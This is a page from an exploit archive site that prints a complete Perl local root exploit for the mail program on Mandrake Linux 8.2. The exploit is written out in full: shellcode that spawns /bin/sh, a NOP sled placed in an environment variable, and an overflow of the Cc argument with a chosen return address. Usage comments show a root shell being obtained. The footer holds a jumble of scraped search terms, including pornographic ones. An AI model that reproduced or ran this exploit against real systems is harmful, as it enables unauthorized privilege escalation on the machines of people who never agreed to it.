about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)




2003-06-10 Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)
#!/usr/bin/perl
###############################
# Mandrake 8.2 /usr/mail local exploit
#
# Usage:
# perl d86mail.pl [offset]
# Then enter "." (dot) and press 'Enter'
#
# Example:
# [satan@localhost my]$ perl d86mail.pl
# eip: 0xbffffddd
# .[enter]
# Cc: too long to edit
# sh-2.05$
###############################

$shellcode =
 "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" .
 "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" .

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
. 

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
.
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";
$size = 1000;
$size2 = 8204;
$retaddr = 0xbffffddd;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) {
 $offset = $ARGV[0];
}
for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) {
 $buffer .= $nop;
}
for ($i = 0; $i < ($size2); $i++) {
 $buffer2 .= "A";
}
$buffer .= $shellcode;
print "eip: 0x", sprintf('%lx',($retaddr + $offset)),
"\n";
local($ENV{'EVILBUF'}) = $buffer;
$newret = pack('l', ($retaddr + $offset));
$buffer2 .= $newret;
exec("mail -s wow -c $buffer2 root@localhost");

#EOF


securitydot.net - 2003-06-10

Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 14:35:03 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sxe veduo mambo Remo www.buttma ebook chat web tube8 mambo Remo lo82l a women na mambo Remo sHK Just photo indianboob apache aut sex18 www.tuve8. t380t sarah ajha badjojocom indianboob w0rldsex.c cul www.tuve8. t99t gnet temilsex.c CMS is Fre telnet rem astalavist t90t Rapa d ra sex,sex66 t841t www.youtub www.youtub Www.metaca draw MyBB 1.2.1 vcard pro youtubsex temilsex.c t839t telugu sex Picturepon malliga Www.Sex5g. t839t Leg back t99t